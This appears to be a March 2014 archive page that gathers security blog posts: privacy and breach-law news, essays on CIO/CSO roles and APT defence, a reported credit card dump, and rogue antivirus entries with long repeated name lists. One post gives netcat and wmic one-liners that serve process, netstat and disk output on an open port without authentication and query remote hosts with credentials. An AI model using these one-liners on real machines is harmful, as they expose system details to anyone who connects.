Monthly Archives: March 2014

Leak of Grid Vulnerabilities Creates National Security Risks

The recent leak of an internal memo to the former Chair of the Federal Energy Regulatory Commission, which was widely reported by national news media, has created a national security setback for the United States. Many are concerned that the disclosure may provide terrorists and other bad actors a roadmap for causing a prolonged nationwide blackout. Perhaps more importantly, the leak undermines the relationship of trust between industry and government agencies that the parties have been working for years to establish; a relationship that is vital to developing a stronger security posture for the electrical grid and in other critical infrastructure sectors. In an article published in Intelligent Utility Update, Hunton & Williams partner Paul M. Tiao discusses the effects of the leak on national security and on the relationship between the energy industry and the government.

Episode #176: Step Up to the WMIC

Tim grabs the mic:

Michael Behan writes in:

Perhaps you guys can make this one better. Haven’t put a ton of thought into it:

C:\> (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

Then visit http://127.0.0.1:3000

This could of course be used to generate a lot more HTML reports via wmic that are quick to save from the browser. The downside is that in its current state is that the page can only be visited once. Adding something like /every:5 just pollutes the web page with mostly duplicate output.

Assuming you already have netcat (nc.exe) on the system the command above will work fine, but it will only work once. After the browser recieves the data the connection has been used and the command is done. To do this multiple times you must wrap it in an infinite For loop.

C:\> for /L %i in (1, 0, 2) do (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

This will count from 1 to 2 and count by 0, which will never happen (except for very large values of 0). We could use the wmic command to request this information from the remote machine and view it in our browser. This method will authenticate to the remote machine instead of allowing anyone to access the information.

C:\> wmic /node:joelaptop process list full /format:htable > joelaptopprocesses.html && start joelaptopprocesses.html

This will use your current credentials to authenticate to the remote machine, request the remote process in html format, save it to a file, and finally open the file in your default viewer (likely your browser). If you need to use separate credentials you can specify /user:myusername and /password:myP@assw0rd.

Hal, your turn, and I want to see this in nice HTML format. :)

Hal throws up some jazz hands:

Wow. Tim seems a little grumpy. Maybe it's because he can make a simple web server on the command line but has no way to actually request data from it via the command line. Don't worry Little Tim, maybe someday...

Heck, maybe Tim's grumpy because of the dumb way he has to code infinite loops in CMD.EXE. This is a lot easier:

$ while :; do ps -ef | nc -l 3000; done

Frankly, most browsers will interpret this as "text/plain" by default and display the output correctly.

But the above loop got me thinking that we could actually stack multiple commands in sequence:

while :; do
ps -ef | nc -l 3000
netstat -anp | nc -l 3000
df -h | nc -l 3000
...
done

Each connection will return the output of a different command until you eventually exhaust the list and start all over again with the first command.

OK, now let's deal with grumpy Tim's request for "nice HTML format". Nothing could be easier, my friends:

$ while :; do (echo '<pre>'; ps -ef; echo '</pre>') | nc -l 3000; done

Hey, it's accepted by every major browser I tested it with! And that's the way we do it downtown... (Hal drops the mic)

Article 29 Working Party Issues Opinion on Personal Data Breach Notification

On March 25, 2014, the Article 29 Working Party adopted Opinion 03/2014 (the “Opinion”) providing guidance on whether individuals should be notified in case of a data breach.

The Opinion goes beyond considering the notification obligations contained in the e-Privacy Directive 2002/58/EC, which requires telecommunications service providers to notify the competent national authority of all data breaches. The Directive also requires notification (without undue delay) to the affected individuals when the data breach is likely to adversely affect the personal data or privacy of individuals, unless the service provider has satisfactorily demonstrated that it has implemented appropriate technological safeguards that render the relevant data unintelligible to unauthorized parties and that these measures were applied to the data concerned by the security breach.

Adding to the general notification obligation under the proposed EU General Data Protection Regulation (the “Proposed Regulation”), the Opinion provides a non-exhaustive list of examples of data breaches from multiple sectors, where individuals should be notified. In each case, the Opinion also gives examples of technical measures that could have prevented a notification obligation had they been in place prior to the data breach.

The Opinion lists examples of cases where notification to the affected individuals would not be required, such as a confidentiality data breach that only concerns either encrypted data with a state of the art algorithm or salted/keyed, hashed data with a state of the art hash function (assuming all the relevant keys and salts are not compromised). The Opinion also discusses various considerations companies face when assessing whether or not to notify affected individuals, emphasizing the need to factor in likely secondary adverse effects on the individuals and indicating that companies should notify even if only one individual is affected.

According to the Opinion, providing notification in the example cases constitutes a good practice pending the adoption of the Proposed Regulation. The European Parliament recently formally adopted the compromise text of the Proposed Regulation. The next steps for the Proposed Regulation are for the EU Council of Ministers to formulate a position and for trilateral negotiations between the European Commission, Parliament and Council to begin.

FTC Settles with Fandango and Credit Karma over Mobile App Security Failures

On March 28, 2014, the Federal Trade Commission announced proposed settlements with Fandango and Credit Karma stemming from allegations that the companies misrepresented the security of their mobile apps and failed to secure consumers’ sensitive personal information transmitted using their mobile apps.

The FTC alleged that Fandango and Credit Karma did not take reasonable steps to secure their mobile apps, including by overriding the industry standard Secure Sockets Layer (“SSL”) certificate validation process. According to the FTC, by disabling the SSL process, the companies undermined the security of the apps’ communications; any information the apps sent or received could be intercepted by hackers. This type of vulnerability is especially problematic with respect to sensitive transactions on public Wi-Fi networks.

The settlements require Fandango and Credit Karma to establish comprehensive security programs and undergo independent biennial security assessments for 20 years. The companies also are barred from misrepresenting the privacy or security of their products and services.

Read the FTC’s Business Center Blog post regarding the settlements.

Update: On August 19, 2014, the FTC approved the final settlement orders with Fandango and Credit Karma.

Australian Data Breach Notification Bill Re-Introduced

On March 20, 2014, Australia’s Privacy Amendment (Privacy Alerts) Bill 2014 was re-introduced in the Senate for a first read. The bill, which was subject to a second reading debate on March 27, 2014, originally was introduced on May 29, 2013, but it lapsed on November 12, 2013 at the end of the session.

As we previously reported, if passed, the bill would amend the Privacy Act 1988 by introducing a mandatory breach notification requirement for “serious data breaches.” The proposed definition of “serious data breach” includes a harm threshold: pursuant to the bill, the breach notification obligation would be triggered if unauthorized access to, or disclosure of, personal information would result in a “real risk of serious harm” to the individual to whom the information relates. In the event an organization “believes on reasonable grounds” that there has been a “serious data breach,” the organization would be required, as soon as practicable, to notify affected individuals and submit a copy of the notification to the Australian Privacy Commissioner. The bill also contemplates notification methods, and would allow the Privacy Commissioner to exempt organizations from the notification requirement under certain circumstances.

CIO vs CSO: Allies or Enemies


Whenever a breach occurs it reveals weaknesses in how an organization approached security.  Compromises are a great way to reveal the hidden sins organizations are committing.  In the case of the Target breach, it is a gift that keeps on giving.  While the initial breach report came out in December, it seems every week there are new “interesting” details that are revealed.  One of the more recent items is the fact that Target did not have a CSO and all security responsibilities were buried under the CIO.

The first question that people ask is whether the CIO should have been held responsible for the breach.  The bottom line is when a major event like this occurs; someone needs to be held responsible for the negligence.  Therefore it is not surprising that someone was blamed for the breach.  What was surprising is that security was a responsibility of the CIO.  The fact that a large organization did not have a separate CSO that is a peer with the CIO, is what is most concerning about the story.  Clearly many things went wrong during the breach and whoever had the responsibility of security needs to be held accountable.  However, it was not fair that the executives structured the company in this manner.  Running the IT infrastructure (typically a role of the CIO) and protecting the information (typically a role of the CSO) are two different roles and it is unfair to have one person expected to do both effectively.  These roles while at times can be complementary, they are often at odds.  Having security buried under the CIO, puts that person in a conflict of interest situation.

First and foremost, organizations of any size, especially one the size of Target needs to have an executive that is responsible for security.  With the large interdependence organizations have on a digital infrastructure, security needs to have a seat at the table in the boardroom.  If security gets buried under IT, whose primary responsibility is running a reliable infrastructure, bad decisions will be made and breaches will happen. 

Not having a CSO today is like a football team not having a quarterback.  You can have the best playbook in the world, but if you do not have someone on the field calling the plays, you are not going to win many games.  In order for organizations to be successful, they must have a reliable infrastructure and proper protection of information.  If an organization only has a CIO and no CSO, no one is focusing in on security and the results are pretty obvious.  If there is no one focusing in on security, bad things will happen.  Lack of a CSO, means lack of security.  It is almost a guarantee that Target had an amazing security team and they were screaming and yelling about all of the security issues, but there was no advocate who was listening to them and fighting their cause with the executives.  From the engineers, their needs to be a communication path to the CEO and the CSO is that channel.  Without a CSO, the proper security communication does not make it to the executives.  Therefore if the executives received the proper information about security, my guess is they would have made different decisions and this story would potentially have a happy ending.

The CIO and CSO need to be peers.  IT and security need to have equal representation in the board room, making sure the executives have accurate information.  Typically the CIO will report to the COO and the CSO will report to CFO.  The COO and CFO directly report to the executive.  However an organization decides to structure it, the CIO and CSO must have a different reporting structure.

In order for the CIO and CSO’s to have an effective working relationship, they must have clear boundaries of responsibility.  Typically what works best is for the CSO to define the proper level of security, the CIO to implement the security and the auditor to validate that the security is being done correctly.  The security that is defined by the CSO should be based off of metrics that are used as a reporting structure to the executives, so they can understand the proper level of risk to accept for the organization.  Metrics based security is key to success.  With metrics there are clear guidelines of what must be done and an easy way to measure compliance.

Organizations in this day and age must have a CSO.  Every day that passes, with more breaches becoming public, it becomes easy to convince the executives that they need a CSO.  The problem is many CIO’s do not want to have a CSO, because it is easier for them to accomplish their jobs if they control all aspects of the IT infrastructure.  Therefore the CIO will not usually lobby for a CSO.  There needs to be another advocate convincing the CEO.  The simple question to sell the CEO is “are you comfortable with the level of security at your organization and are you receiving the proper security metrics to make the decisions?”  The problem today is many CEO’s want to create a position of a CSO, but the CIO convinces them they do not need one.  While they have good intentions, it is often the CIO that lobbies against a CSO, since a CSO will cause them to give up control and potentially make their job more difficult.  For example, when a CSO comes in they often disclose all of the security problems, which show that security was not being properly addressed within the organization.

Defending Against the APT


Advanced Persistent Threat (APT)

Introduction
APT, formerly known as the Advanced Persistent Threat, is the buzz word that everyone is using. Companies are concerned about it, the government is being compromised by it and consultants are using it in every presentation they give.   One of the main reasons organizations are broken into today is because they are fixing the wrong vulnerabilities.  If you fix the threats of 3 years ago, you will lose.  APT allows organizations to focus on the real threats that exist today.

While APT is important, we need to clear the smoke and hype, focusing on why it is important and what it means to you.  Instead of just using it as a buzz word, if we understand the core components of APT, we can use it to improve our security.  In APT, threat drives the risk calculation.  Only by understanding the offensive threat will an organization be able to fix the appropriate vulnerabilities. 

What is APT?
APT is the new way attackers are breaking into systems.  APT is a sophisticated, mercurial way that advanced attackers can break into systems, not get caught, keeping long-term access to exfiltrate data at will.  The following are the important things to remember:

1)      APT focuses on any organization, both government and non-government organizations.  Some people make the mistake of thinking that the APT is only focused on Department of Defense (DoD) sites.  When it comes to the Internet the lines between government and commercial are blurring and anything that could cause harm to a country will be targeted.

2)      While the threat is advanced once it gets into a network, the entry point with many attacks is focusing on convincing a user to click on a link.  However, once the APT breaks into a system, it is very sophisticated in what it does and how it works.  Signature analysis will be ineffective in protecting against it.  Advanced attacks are always changing, recompiling on the fly and utilizing encryption to avoid detection.

3)      Many organizations make the mistake of thinking of attacks like the weather.  There will be some stormy days and there will be some sunny days.  However, on the Internet you are always in a storm.  In the past, attackers would periodically attack an organization.  Today attacks are nonstop.  The attackers are persistent, and if an organization lets their guard down for any period of time, the chance of a compromise is very high.

4)      Attackers want to take advantage of economy of scales and break into as many sites as possible as quickly as possible.  Therefore the tool of choice of an attacker is automation.  Automation is not only what causes the persistent nature of the threat, but it is also what allows attackers to break into sites very quickly.

5)      Old school attacks were about giving the victim some visible indication of a compromise.  Today it is all about not getting caught.  Stealth and being covert are the main goals of today’s attacks.  APT‘s goal is to look as close {if not identical} to legitimate traffic.  The difference is so minor that many security devices cannot differentiate between them.

6)      The driver of APT is to provide some significant benefit to the attacker, the benefit being either economic or financial gain.  Therefore the focus will be all about the data.  Anything that has value to an organization means it will have value to an attacker.  Since data has become so portable, and with cloud computing increasing in popularity, data is now available from the Internet, via many sources.

7)      Attackers do not just want to get in and leave, they want long term access.  If someone is going to spend effort breaking into a site, they will make sure they can keep that access for a long period of time.  Stealing data once has value, but stealing data for 9 months gives the attacker even more payoff.

Putting all of this together means that you will be constantly attacked and compromised, making it necessary for an organization to always be in battle mode.  This is a never ending battle.  Since the APT is meant to be extremely stealthy, there is a good chance that an organization might be compromised and not know about it for several months.  Before you discount this, if you were compromised and the attacker was not doing any visible damage, how would you know? 

How to Defend Against the APT?
Prevention is ideal, but detection is a must.  Most organizations focus solely on preventive measures but the problem with the APT is that it enters a network and looks just like legitimate traffic and users.  Therefore, there is little to prevent.  Only after the packets are in the network do they start doing harm and breaking in.

Based on the new threat vectors of the APT, the following are key things organizations can do to prevent against the threat:

1)      Control the user and raise awareness – the general rule is you cannot stop stupid, but you can control stupid.  Many threats enter a network by tricking the user into clicking a link that they shouldn’t.  Limiting the actions a user are allowed to do with proper awareness sessions can go a long way to reduce the overall exposure.

2)      Perform reputation ranking on behavior – traditional security tries to go in and classify something either as good or bad, allow or block.  However with advanced attacks, this classification does not scale.  Many attackers start off looking like legitimate traffic, which means they would be allowed into the network, and then once they are in they turn bad.  Therefore, since the goal of attackers is to blend in, you need to track what the behavior is and rank the confidence level of whether it is looking more like a legitimate user or more like evil.

3)      Focus on outbound traffic – Inbound traffic is often what is used to prevent and stop attackers from entering a network.  While it will catch some attacks and is still important to do, with the APT it is the outbound traffic that is more damaging.  If the intent is to stop exfiltration of data and information, looking at the outbound traffic is how you detect anomalous behavior, which is tied to damage to an organization. 

4)      Understand the changing threat – it is hard to defend against something you do not know about.  Therefore, the only way to be good at the defense is to understand and know how the offense operates.  If organizations do not continue to understand the new techniques and tactics of the attackers, they will not be able to effectively tune their defensive measures to work correctly.

5)      Manage the endpoint – while attackers might break into a network as the entry point, they ultimately want to steal information that exists on endpoints.  If you want to limit the damage, controlling and locking down the endpoint will go a long way to protect an organization.

While the current threat is advanced, persistent, stealthy, and data focused, organizations can implement effective measures to protect their sites.

Summary
APT is only going to increase in intensity over the next year, not go away.  Ignoring this problem just means there will be harm caused to your organization.  The key theme of dealing with APT is “Know thy system/network.”  The more an organization can understand about network traffic and services, the better they can spot/identify anomalies through clipping levels, which is the better way to defend against the APT.  The ultimate way to make sure an organization is properly protected is to run simulated attacks (i.e. penetration testing, red teaming, ethical hacking) and see how vulnerable an organization is, and most importantly how quickly you detected it.  The key to making this successful is to 1) always get explicit approval 2) run benign attacks 3) make sure the people running the test are of equal expertise to the true attacker; and 4) fix any vulnerabilities in a timely manner.  The good news is, by focusing in on understanding the threats and an organization’s vulnerabilities, you can properly defend against the APT. 

Windows AntiBreach Patrol

Windows AntiBreach Patrol is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Antivirus Patrol, Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Windows Antivirus Patrol

Windows Antivirus Patrol is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Potential 7 Million Credit Card Details Leaked

UPDATE: Based on further analysis along with discussions with journalists, it appears that this credit card dump contains valid, but older card data that had been previously disclosed. To date, there is no solid evidence this represents a new breach.

The last couple of weeks have seen tensions rising between Russia and Ukraine, and along with it an increase in computer crime.

Sometime earlier this morning, a post allegedly by Anonymous Ukraine has claimed to have published “more than 800 million credit cards” by releasing four archives: Visa, Mastercard, American Express, and Discover cards. Based on the initial analysis by Risk Based Security, the number appears to come to a total of 955,579 cards.

While such an attack does not appear to be directly related to the political strife between Ukraine and Russia, it does raise significant issues for card processors and consumers if the leak is legitimate.

Anonymous Ukraine has posted a short message to Pastebin that includes the following:

Today we publish the first part of our exposure of the international financial system Visa, MC, Discover & Amex, enslaved people around the world. More than 800 million credit cards. Over a trillion dollars.

Each of the four archives appear to have valid card numbers, bank routing numbers, and full names. The dump of information does not contain the credit card CCV (Card Verification Value) or card expiry information. Without this information, committing fraud with the leaked information may be more difficult.

At this time, there is no indication where the data comes from or if it is from a single source or multiple. Risk Based Security and the DatalossDB project will continue to examine the data and investigate in hopes of determining more information about the breach.

Update 7:40P EST – In addition to the 1 million cards disclosed earlier, Anonymous Ukraine has followed up with an additional leak of over 6 million more cards announced in a Tweet. Initial analysis of the new dump by RBS shows 6,064,823 new cards. That breaks down to 668,279 American Express, 3,255,663 Visa, 1,778,749 Mastercard, and 362,132 Discover. Counting the disclosure earlier today and the subsequent dump, the grand total now sits at 7,020,402. Upon cursory examination, a majority of cards seem to come from United States banks. Among the information released, approximately 4,000 come with full user data including social security number, credit card, card card expiry, name, pins, floats, dates of birth, states, and zip codes. The new Pastebin dump from the group also suggests the data may come from ATMs or POS systems.

Interview with Gary McGraw – Episode 366 – March 20, 2014

Gary McGraw is an author of many books and over a 100 peer-reviewed publications on IT security. In addition, Gary McGraw serves on the Dean’s Advisory Council for the School of Informatics of Indiana University, and produces the monthly Silver Bullet Security Podcast for IEEE Security & Privacy magazine (syndicated by informIT). Gary is the Chief Technical Officer at Cigital Inc. In addition, he serves on the advisory boards of several companies, including Dasient, Fortify Software, Invincea, and Raven White. He holds dual PhD in Cognitive Science and Computer Science from Indiana University. In the past, Gary McGraw has served on the IEEE Computer Society Board of Governors.

Live from SANS ICS – Episode 365 – March 16, 2014

Justin Searle is a Managing Partner of UtiliSec, specializing in Smart Grid security architecture design and penetration testing. Justin led the Smart Grid Security Architecture group in the creation of NIST Interagency.

Michael Assante is an internationally recognized thought leader in cyber security of industrial control systems. Assante held the position of Vice President and Chief Security Officer at the North American Electric Reliability Corporation and oversaw the implementation of cyber security standards across the North American electric power industry.

Matthew E. Luallen is a well-respected information professional, researcher, instructor, and author. Mr. Luallen serves as the president and co-founder of CYBATI, a strategic and practical educational and consulting company. CYBATI provides critical infrastructure and control system cybersecurity consulting, education, and awareness.

Jonathan Pollet, Founder and Principal Consultant for Red Tiger Security, USA has over 12 years of experience in both Industrial Process Control Systems and Network Security.

Cyber Insurance: Not Just for Data Protection

President Obama’s Executive Order 13636 on Improving Critical Infrastructure Cybersecurity identified “insurance liability considerations” as an incentive that might improve security. Over the course of the year since the Executive Order was issued, there has been an increase in the marketing of cyber insurance products. In an article published in Law360, Hunton & Williams Insurance Litigation & Counseling partner Lon Berk discusses how most cyber insurance policies currently available do not protect against major risks to critical infrastructure. Since the Executive Order, insurers have taken steps to restrict coverage, resulting in a reduction in the protection of critical infrastructure against cyber attacks.

2014 Privacy, Policy and Technology Summit

Join us in New York City on May 19-20, 2014, for the Privacy, Policy & Technology Summit – A High Level Briefing for Today’s Top Privacy Executives. Lisa Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP will be a featured speaker at the session on “Cybersecurity: Insider Tips for Proactively Protecting Your Company and Its Data While Reducing Downstream Regulatory and Litigation Exposure.”

Other sessions will cover timely topics such as social media, Big Data, managing vendors and third party relationships, risk management and protecting data during transactions.

 

Hunton Global Privacy Update – March 2014

On March 18, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program focused on some of the recent developments in privacy, including observations from the International Association of Privacy Professionals’ Global Privacy Summit in Washington, D.C., earlier this month, the National Institute of Standards and Technology final Cybersecurity Framework and the Article 29 Working Party’s recent Opinion on Binding Corporate Rules and Cross-Border Privacy Rules.

Listen to a recording of the March 2014 Hunton Global Privacy Update.

Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Privacy Update is slated for May 14, 2014.

Code Injection and API Hooking Techniques

Hooking covers a range of techniques used for many purposes like debugging, monitoring, intercepting messages, extending functionality etc. Hooking is also used by a lot of rootkits to camouflage themselves on the system. Rootkits use various hooking techniques when they have to hide a process, hide a network port, redirect file writes to some different […]

HHS Announces Pre-Audit HIPAA Surveys

The Department of Health and Human Services’ Office for Civil Rights (“OCR”) recently announced that it intends to survey up to 1,200 covered entities and business associates to determine their suitability for a more fulsome HIPAA compliance audit. In a notice published in the Federal Register, OCR stated that the survey will collect information such as “number of patient visits or insured lives, use of electronic information, revenue, and business locations” to assess the organizations’ “size, complexity and fitness” for an audit.

The Health Information Technology for Economic and Clinical Health (“HITECH”) Act requires OCR to “provide for periodic audits to ensure that covered entities and business associates” are complying with the HITECH Act and its implementing regulations. HHS conducted an audit of 115 covered entities in 2012. That audit found that compliance with the HIPAA Security Rule was lacking – notably, roughly 2 out of 3 of audited entities did not have a complete and accurate risk assessment. It also found that many entities were unaware of specific HIPAA Privacy Rule requirements, such as the obligation to provide a notice of privacy practices to individuals.

Although the total number of audits in 2014 is uncertain, expanding the audit program will provide a clearer picture of the extent of HIPAA compliance by business associates.

Read about our prior coverage of the HIPAA audit protocol.

Brazil Removes Local Data Storage Requirement from Internet Bill

On March 18, 2014, Brazilian lawmakers announced the withdrawal of a provision in pending legislation that would have required Internet companies to store Brazilian users’ data within the country.

The Marco Civil da Internet (“Marco Civil”), a draft bill introduced in the Brazilian Congress in 2011, proposes Brazil’s first set of Internet regulations, including requirements regarding personal data protection and net neutrality. As we previously reported, the Marco Civil received renewed attention last year in the wake of revelations that the U.S. National Security Agency’s PRISM surveillance program may have monitored digital communications in Brazil. In response, the Marco Civil was amended to add a local data storage requirement for Brazilian data. The provision generated controversy and opposition from Internet companies that claimed complying with the requirement would be expensive and burdensome.

According to reports, the legislation now states that global Internet companies “are subject to Brazilian laws in cases involving information on Brazilians even if the data is stored abroad.”

Windows Pro Defence Kit

Windows Pro Defence Kit is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, 